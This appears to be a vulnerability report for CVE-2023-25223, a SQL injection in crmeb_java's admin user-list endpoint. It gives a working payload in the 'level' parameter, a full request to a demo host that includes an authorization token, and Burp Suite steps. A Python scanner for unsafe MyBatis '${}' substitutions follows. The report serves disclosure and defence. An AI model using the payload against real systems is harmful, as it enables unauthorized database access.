CVE-2023-25223: There is a sql injection vulnerability exists in crmeb_java · Issue #9 · crmeb/crmeb_java
CRMEB <=1.3.4 is vulnerable to SQL Injection via /api/admin/user/list.
[Suggested description]
A SQL injection vulnerability exists in crmeb_java <=1.3.4.
The /api/admin/user/list endpoint does not filter the 'level' parameter, which leads to SQL injection.
[Vulnerability Type]
SQLi
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2
Host: api.java.crmeb.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a
Origin: https://admin.java.crmeb.net
Referer: https://admin.java.crmeb.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
[Attack Type]
Remote
[Vulnerability details]
Step 1: log in as admin, open User Manager and click the search button.
Step 2: intercept the request with Burp Suite.
Step 3: insert the payload into the parameter "level":
level=1+and+extractvalue(1,CONCAT(1,user()))
https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%
There you can see the result.
[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36: "${level}"
When "${}" is used, MyBatis does no processing and splices the value directly into the SQL statement, which leads to SQL injection.
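As an added example (not code from the crmeb_java project), the following static check flags every MyBatis "${}" string substitution in a mapper file while ignoring "#{}" placeholders, which MyBatis binds as prepared-statement parameters and are the safe replacement for "${level}". The mapper text below is constructed for the demonstration and is not the project's UserMapper.xml.

```python
import re
from typing import List, Tuple

# Constructed MyBatis mapper fragment (not the project's UserMapper.xml);
# it mixes the unsafe ${} substitution with the safe #{} placeholder.
SAMPLE_MAPPER = """<?xml version="1.0" encoding="UTF-8"?>
<mapper namespace="example.UserDao">
  <!-- ${comment} inside an XML comment is not SQL -->
  <select id="list" resultType="map">
    SELECT * FROM eb_user
    WHERE status = #{status}
    <if test="level != null">AND level = ${level}</if>
    ORDER BY ${orderBy}
  </select>
</mapper>
"""

COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)
SUBST_RE = re.compile(r"\$\{\s*([A-Za-z_][\w.]*)\s*\}")


def find_string_substitutions(xml_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, parameter, line_text) for every ${...} in the mapper.

    XML comments are blanked out first (newlines kept) so line numbers stay
    correct and commented-out text is not reported. #{...} placeholders are
    bound as prepared-statement parameters by MyBatis and are not flagged.
    """
    stripped = COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group(0)), xml_text)
    findings = []
    for lineno, line in enumerate(stripped.splitlines(), start=1):
        for match in SUBST_RE.finditer(line):
            findings.append((lineno, match.group(1), line.strip()))
    return findings


def scan_file(path: str) -> List[Tuple[int, str, str]]:
    """Scan one mapper XML file on disk (e.g. a real UserMapper.xml)."""
    with open(path, encoding="utf-8") as fh:
        return find_string_substitutions(fh.read())


if __name__ == "__main__":
    for lineno, param, text in find_string_substitutions(SAMPLE_MAPPER):
        print(f"line {lineno}: ${{{param}}} -> {text}")
```

Any hit on a parameter that comes from an HTTP request is a finding to fix with "#{}"; the remaining legitimate uses (such as a dynamic ORDER BY column) need an allowlist of permitted values before substitution.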